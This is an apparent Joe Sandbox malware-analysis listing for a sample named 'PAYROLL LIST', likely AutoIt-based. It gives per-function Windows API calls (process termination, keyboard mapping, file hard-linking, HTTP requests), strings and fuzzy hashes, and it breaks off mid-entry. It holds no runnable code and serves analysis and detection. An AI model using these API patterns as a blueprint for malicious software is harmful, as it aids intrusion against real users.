ReleaseDC.USER32(00000000,00000000), ref: 00A5E1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00A5E1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 00A5E209

Part of subcall function 00A59AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00A59A05,00000000,00000000,?,00A59DDB), ref: 00A5A53A

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: d2ef9f0157efeace04cb1d007eb6976805832521b86b0c4d0b3e069560d4fe68
Instruction ID: 6140b2f1d7c7a14c1398f6d4af08565d60b2ddab3ec65a5a03b09c017a574813
Opcode Fuzzy Hash: d2ef9f0157efeace04cb1d007eb6976805832521b86b0c4d0b3e069560d4fe68
Instruction Fuzzy Hash: 2E0184B5A40615BFEB109FE58C45B5EBFB8FB49351F004066EE45A72D0D6709D01CFA0

Function 00A47B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00A47B47

Part of subcall function 00A4123A: __initp_misc_winsig.LIBCMT ref: 00A4125E
Part of subcall function 00A4123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00A47F51
Part of subcall function 00A4123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00A47F65
Part of subcall function 00A4123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00A47F78
Part of subcall function 00A4123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00A47F8B
Part of subcall function 00A4123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00A47F9E
Part of subcall function 00A4123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00A47FB1
Part of subcall function 00A4123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00A47FC4
Part of subcall function 00A4123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00A47FD7
Part of subcall function 00A4123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00A47FEA
Part of subcall function 00A4123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00A47FFD
Part of subcall function 00A4123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00A48010
Part of subcall function 00A4123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00A48023
Part of subcall function 00A4123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00A48036
Part of subcall function 00A4123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00A48049
Part of subcall function 00A4123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00A4805C
Part of subcall function 00A4123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00A4806F

__mtinitlocks.LIBCMT ref: 00A47B4C

Part of subcall function 00A47E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00ADAC68,00000FA0,?,?,00A47B51,00A45E77,00AD6C70,00000014), ref: 00A47E41

__mtterm.LIBCMT ref: 00A47B55

Part of subcall function 00A47BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00A47B5A,00A45E77,00AD6C70,00000014), ref: 00A47D3F
Part of subcall function 00A47BBD: _free.LIBCMT ref: 00A47D46
Part of subcall function 00A47BBD: DeleteCriticalSection.KERNEL32(00ADAC68,?,?,00A47B5A,00A45E77,00AD6C70,00000014), ref: 00A47D68

__calloc_crt.LIBCMT ref: 00A47B7A
GetCurrentThreadId.KERNEL32 ref: 00A47BA3

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: 711ee7f3499cc44744ca8f36dd9d41b9ac335e4d0a4a5f75cf10e51d203afac8
Instruction ID: 679066b8997594b4e0977d47241c540b6cc80603a2933b8f57a77361c538ed03
Opcode Fuzzy Hash: 711ee7f3499cc44744ca8f36dd9d41b9ac335e4d0a4a5f75cf10e51d203afac8
Instruction Fuzzy Hash: 1FF0B43A11D3D219E625BB747E07A4F27C4DF82735B200BAAF9A6D54D2FF60884345A1

Function 00A227EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A2281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00A22825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A22830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A2283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00A22843
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A2284B

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 39d8cc134444025f51d055d9a397fdd780366be46538ff86344de15b323834d6
Instruction ID: ad9113c7fd7f246de1a658b5d1cb06fad0c0818ef3366a2cf283c905227a0dd7
Opcode Fuzzy Hash: 39d8cc134444025f51d055d9a397fdd780366be46538ff86344de15b323834d6
Instruction Fuzzy Hash: B20167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A82C7F5A864CBE5

Function 00A69AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: d3c5763a9d9d3a41e52e8261e4a0ea0913eb245fbc1e5ed04916b3ac560a8240
Instruction ID: b163e0729a80f519a707df454c96be301f6b90c41918dfd4cfbce4fec5bb86de
Opcode Fuzzy Hash: d3c5763a9d9d3a41e52e8261e4a0ea0913eb245fbc1e5ed04916b3ac560a8240
Instruction Fuzzy Hash: 8601A436102212ABDB159BD4ED48EEB77BDFF99742B04042DF543968E0DB749806DB60

Function 00A67BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A67C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A67C1D
GetWindowThreadProcessId.USER32(?,?), ref: 00A67C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A67C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A67C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A67C4C

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 6b801a315a47d3ca5aac46131f935515e2a84e8cff6bdc5bfd5fb77cbba72c68
Instruction ID: 582372c9394999b8042204144473dc0bfd6f711d9a4903a9a0d48a81652831f2
Opcode Fuzzy Hash: 6b801a315a47d3ca5aac46131f935515e2a84e8cff6bdc5bfd5fb77cbba72c68
Instruction Fuzzy Hash: D6F09A7220115ABBE7209B929C0EEEF3F7CEFC7B15F000018FA4291090E7A01A42C6B5

Function 00A69A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00A69A33
EnterCriticalSection.KERNEL32(?,?,?,?,00A95DEE,?,?,?,?,?,00A2ED63), ref: 00A69A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,00A95DEE,?,?,?,?,?,00A2ED63), ref: 00A69A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00A95DEE,?,?,?,?,?,00A2ED63), ref: 00A69A5E

Part of subcall function 00A693D1: CloseHandle.KERNEL32(?,?,00A69A6B,?,?,?,00A95DEE,?,?,?,?,?,00A2ED63), ref: 00A693DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 00A69A71
LeaveCriticalSection.KERNEL32(?,?,?,?,00A95DEE,?,?,?,?,?,00A2ED63), ref: 00A69A78

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 99637bd05268a5ad27f67535dd98acba17824fdce24f24b0825cab4bab245697
Instruction ID: f13ecd45bfce105e8799b037ff588e7c3dbf25c1bc23a5744bab090ea28afa0c
Opcode Fuzzy Hash: 99637bd05268a5ad27f67535dd98acba17824fdce24f24b0825cab4bab245697
Instruction Fuzzy Hash: 9BF08276141212ABD7125BE4EC8DEEB7B79FF86302B140429F543958E0DB799806DB60

Function 00A21CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 00A3F4EA: std::exception::exception.LIBCMT ref: 00A3F51E
Part of subcall function 00A3F4EA: __CxxThrowException@8.LIBCMT ref: 00A3F533

__swprintf.LIBCMT ref: 00A21EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00A21D49

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: ee4dd14ddd69298f82a4d2be71a50c0a55138d5230b9e5cac50eb1436316c120
Instruction ID: 690a4e7dfe6f1ce07a61ca75d1c62e1159a7484f7f556585149e2c87783e182d
Opcode Fuzzy Hash: ee4dd14ddd69298f82a4d2be71a50c0a55138d5230b9e5cac50eb1436316c120
Instruction Fuzzy Hash: 4C916C71204621AFCB24EF28D995D6EB7F4BF95710F01492DF886972A1DB30ED04CB92

Function 00A7AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A7B006
CharUpperBuffW.USER32(?,?), ref: 00A7B115
VariantClear.OLEAUT32(?), ref: 00A7B298

Part of subcall function 00A69DC5: VariantInit.OLEAUT32(00000000), ref: 00A69E05
Part of subcall function 00A69DC5: VariantCopy.OLEAUT32(?,?), ref: 00A69E0E
Part of subcall function 00A69DC5: VariantClear.OLEAUT32(?), ref: 00A69E1A

Strings

AUTOIT.ERROR, xrefs: 00A7B11B
Incorrect Parameter format, xrefs: 00A7B03E, 00A7B20B

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: d6baea2e277f790e7cd7e1a403d1c47454b870c78c057451f61f03e7653ab537
Instruction ID: 34edbf9a59418881421164006291e0142246ae0c03eabfc174c8fdbbaa739fa8
Opcode Fuzzy Hash: d6baea2e277f790e7cd7e1a403d1c47454b870c78c057451f61f03e7653ab537
Instruction Fuzzy Hash: 7C916E706043019FCB10DF28D991A9BB7F4AF89714F04886DF89A9B362DB31E905CB62

Function 00A65347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A3C6F4: _wcscpy.LIBCMT ref: 00A3C717

_memset.LIBCMT ref: 00A65438
GetMenuItemInfoW.USER32(?), ref: 00A65467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A65513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A6553D

Strings

0, xrefs: 00A65430

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 2732204ac55b010f59e9fe3eea87162ec2aee3be63edd1084f05d1c982f420f4
Instruction ID: 42dfc0a7c9b715d2ba7b3977fb734b6cade40b915c2e69af7058c243d0d6b571
Opcode Fuzzy Hash: 2732204ac55b010f59e9fe3eea87162ec2aee3be63edd1084f05d1c982f420f4
Instruction Fuzzy Hash: B9510371A047119BD714DB38C9896ABB7F9AF85760F04062AF8A6D72D0DB70CD448B52

Function 00A60213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A6027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00A602B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00A602C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A60344

Strings

DllGetClassObject, xrefs: 00A602B7

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: c33c4813843c62fc3c16142a4b0ce3720f86f13e9351140badcdd8ce900cda71
Instruction ID: 0cea40e997e4844b8bfba27ef299f38d20790c4dc65946126f7f32af5ba99dd6
Opcode Fuzzy Hash: c33c4813843c62fc3c16142a4b0ce3720f86f13e9351140badcdd8ce900cda71
Instruction Fuzzy Hash: 3D415BB1600204EFDB15CF54C884F9B7BB9EF45311F1484A9E949DF246D7B1D984CBA0

Function 00A65007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A65075
GetMenuItemInfoW.USER32 ref: 00A65091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 00A650D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00AE1708,00000000), ref: 00A65120

Strings

0, xrefs: 00A6506D

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 04742609b4e74c2476386b31ea902f7039d1e9570c3e1f5e32c2139efb40ab6a
Instruction ID: 2e1fe55ba02c90dcc7765b702ccb42072b1b868310778cfee62bcf3ca0fffa14
Opcode Fuzzy Hash: 04742609b4e74c2476386b31ea902f7039d1e9570c3e1f5e32c2139efb40ab6a
Instruction Fuzzy Hash: 024191716047019FD720EF38D885B6AB7F4AF8A314F14465EF9A6972D1D730E904CB62

Function 00A6E698 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A6E742
GetLastError.KERNEL32(?,00000000), ref: 00A6E768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A6E78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00A6E7B9

Strings

p1#v`K$v, xrefs: 00A6E78D

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID: p1#v`K$v
API String ID: 3321077145-1068180069
Opcode ID: a47e787cade33342789c603d3c656f9f68c941c4bcf00b59d1a182490031b675
Instruction ID: 2e1a57c6173d347892d965045649eeaa18de01614710afcc3ed122bd7558cf12
Opcode Fuzzy Hash: a47e787cade33342789c603d3c656f9f68c941c4bcf00b59d1a182490031b675
Instruction Fuzzy Hash: 98411339600611DFCF11EF18D644A4EBBE5AF99710F198498E946AF3A2CB30EC01CB95

Function 00A80567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 00A80587

Strings

none, xrefs: 00A80662
winapi, xrefs: 00A805F8
cdecl, xrefs: 00A805DE
stdcall, xrefs: 00A80609

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: e898c3120185dc83c747f529ae2145f80ef9d9759a73760d2123465fbae61250
Instruction ID: 22e5cd7baa842081f1c75cb621fd41a54f22b99e7a6316ca84d73d528a92f2f4
Opcode Fuzzy Hash: e898c3120185dc83c747f529ae2145f80ef9d9759a73760d2123465fbae61250
Instruction Fuzzy Hash: 1A318F70500216AFCF00EF58DA41DAEB3B5FF55314B108A2AE826A76D1EB71A915CB90

Function 00A5B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00A5B88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00A5B8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 00A5B8D1

Strings

ComboBox, xrefs: 00A5B815
ListBox, xrefs: 00A5B84D

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: ba6ee2006cb526c02fe4ea6e5522e509ffc36ed28722c25794a1bdd6d2c84c11
Instruction ID: 488865e0e102b59e46b3830273b11217490e6db61914283724944ff3a13ed323
Opcode Fuzzy Hash: ba6ee2006cb526c02fe4ea6e5522e509ffc36ed28722c25794a1bdd6d2c84c11
Instruction Fuzzy Hash: AB210272910108BFDB14ABB8D986DFE777CEF16362B104129F822A71E1DB784D0AD760

Function 00A251AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A2522F
_wcscpy.LIBCMT ref: 00A25283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A25293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A93CB0

Strings

Line: , xrefs: 00A93CD9

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: e5708ddb9d5c8d818ed9b64e14eeddbed2584ee1bb05f19317f173884df9b6a9
Instruction ID: 198c9dcc35d411e7b9086459e73608f3d8eecf7e392085c25da8834e6d290ed0
Opcode Fuzzy Hash: e5708ddb9d5c8d818ed9b64e14eeddbed2584ee1bb05f19317f173884df9b6a9
Instruction Fuzzy Hash: B231C171808760AFD721EBA8ED46FDE77E8BB44310F00462EF595960D1DB70A649CB92

Function 00A743E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A74401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A74427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A74457
